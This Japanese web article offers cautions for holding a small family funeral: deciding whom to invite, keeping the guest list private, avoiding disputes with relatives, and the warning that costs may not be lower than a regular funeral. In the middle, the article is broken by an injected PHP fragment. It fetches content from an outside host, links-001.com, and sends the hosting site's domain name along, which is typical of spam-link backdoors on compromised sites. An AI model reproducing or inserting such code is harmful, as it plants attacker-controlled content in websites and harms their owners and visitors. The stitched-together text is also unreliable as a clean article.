前へ
次へ

家族葬を行う際に注意して欲しい事とは

様々な形式の葬儀が現れている中で、特に注目を集めているのが家族葬です。
親族や故人と本当に親しかった人のみで取り行う形式なので、余り気兼ねをする必要なくリラックスした雰囲気の中で行える事が多いため、この形式で行って欲しいという人も年々増加傾向にあります。
そんな中でも、この形式を取り行う際にはいくつか注意しておきたい事があります。
まず注意して欲しいのが、親族以外に呼ぶ人をどうするかという点です。
故人とプライベートでの付き合いがあった会社の同僚の人等を遺族が認識しておらず、後のお別れの会等で気まずい雰囲気になった等といったトラブルも多いといいます。
それ以外にも、家族葬に呼ばれなかった人が葬儀が終わった後に線香をあげたい等と殺到してしまう恐れもあります。
そうした事が無いように、故人の生前の交友関係を携帯電話等から調べ、抜かりの無いようにしましょう。
また、葬儀に呼ぶ人を決定したら、その事がその他の人に知られないようにする事も大切です。
一度情報が漏れてしまうと、人が押し寄せて急遽形式変更を余儀なくされるというケースもありますので、参列者への口止め等を必ず行っておきましょう。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

また、いくら親族や近しい関係の人のみで行うといっても、葬儀の手順や準備するもの等でもめ事にならないとは限りません。
特に、故人が遺書等で明確に家族葬にして欲しいという意思を表示している場合は良いですが、遺族が決定した場合には他の親族等ともめ事になるようなケースが見受けられます。
この形式にしたいという旨を親族に伝えておく等の根回しを行っておく事が重要といえます。
さらに、この形式を費用が抑えられるからと考えて行う場合も注意が必要です。
確かに、家族葬は参列者も少なく抑えられ、仕出し弁当等の費用が抑えられますが、香典もその分少なくなります。
行う内容や会場代によっては、一般的な葬儀より高くついてしまう事があるという事を頭に入れておきましょう。

Page Top